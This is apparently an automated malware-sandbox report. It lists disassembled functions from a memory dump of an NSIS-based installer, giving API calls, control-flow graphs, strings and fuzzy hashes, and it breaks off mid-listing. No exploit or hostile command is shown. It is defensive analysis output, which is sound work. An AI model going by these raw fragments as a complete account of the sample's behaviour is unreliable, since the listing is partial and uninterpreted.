                                                                                                                                                                                  control_flow_graph 797 401eb9-401ec4 798 401f24-401f26 797->798 799 401ec6-401ec9 797->799 800 401f53-401f7b GlobalAlloc call 406805 798->800 801 401f28-401f2a 798->801 802 401ed5-401ee3 call 4062a3 799->802 803 401ecb-401ecf 799->803 816 4030e3-4030f2 800->816 817 402387-40238d GlobalFree 800->817 805 401f3c-401f4e call 406009 801->805 806 401f2c-401f36 call 4062a3 801->806 814 401ee4-402702 call 406805 802->814 803->799 807 401ed1-401ed3 803->807 805->817 806->805 807->802 813 401ef7-402e50 call 406009 * 3 807->813 813->816 829 402708-40270e 814->829 817->816 829->816
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                  • GlobalFree.KERNELBASE(0074EC48), ref: 00402387
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeGloballstrcpyn
                                                                                                                                                                                  • String ID: Exch: stack < %d elements$Ht$ManufactureJazz$Pop: stack empty
                                                                                                                                                                                  • API String ID: 1459762280-2508247732
                                                                                                                                                                                  • Opcode ID: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
                                                                                                                                                                                  • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1882500a3a7973729244276bdae00bfd603f91a0f1c5eacb79451a398e12722f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD
                                                                                                                                                                                  Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 832 4022fd-402325 call 40145c GetFileVersionInfoSizeW 835 4030e3-4030f2 832->835 836 40232b-402339 GlobalAlloc 832->836 836->835 837 40233f-40234e GetFileVersionInfoW 836->837 839 402350-402367 VerQueryValueW 837->839 840 402384-40238d GlobalFree 837->840 839->840 843 402369-402381 call 405f51 * 2 839->843 840->835 843->840
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                  • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                  • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                    • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                  • GlobalFree.KERNELBASE(0074EC48), ref: 00402387
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3376005127-0
                                                                                                                                                                                  • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                                                                                                  • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                                                                                                  • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                                                                                                                                                                  Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 848 402b23-402b37 GlobalAlloc 849 402b39-402b49 call 401446 848->849 850 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 848->850 855 402b70-402b73 849->855 850->855 856 402b93 855->856 857 402b75-402b8d call 405f6a WriteFile 855->857 858 4030e3-4030f2 856->858 857->856 862 402384-40238d GlobalFree 857->862 862->858
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                                  • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2568930968-0
                                                                                                                                                                                  • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                                                                                                  • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                                                                                                                                  • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                                                                                                                                                                  Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 865 402713-40273b call 406009 * 2 870 402746-402749 865->870 871 40273d-402743 call 40145c 865->871 873 402755-402758 870->873 874 40274b-402752 call 40145c 870->874 871->870 875 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 873->875 876 40275a-402761 call 40145c 873->876 874->873 876->875
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                  • String ID: <RM>$ManufactureJazz$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                  • API String ID: 247603264-3955903134
                                                                                                                                                                                  • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                                                                                                  • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                                                                                                                                  • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                                                                                                  • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                                                                                                                                                                  Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                  • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                                                                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                  • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                  • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                  • API String ID: 3156913733-2180253247
                                                                                                                                                                                  • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                                                                                                  • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                                                                                                  • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                                                                                                                                                  Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00405E9D
                                                                                                                                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                                                                                  • String ID: nsa
                                                                                                                                                                                  • API String ID: 1716503409-2209301699
                                                                                                                                                                                  • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                                                                                                  • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                                                                                                                                  • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                                                                                                  • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                                                                                                                                                  Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                  • String ID: HideWindow
                                                                                                                                                                                  • API String ID: 1249568736-780306582
                                                                                                                                                                                  • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                                                                                                  • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                                                                                                  • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                                                                                                                                  Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                                                                                                  • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                                                                                                  • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                                                                                                                                  Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                                                                                                  • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                                                                                                  • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                                                                                                                                  Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
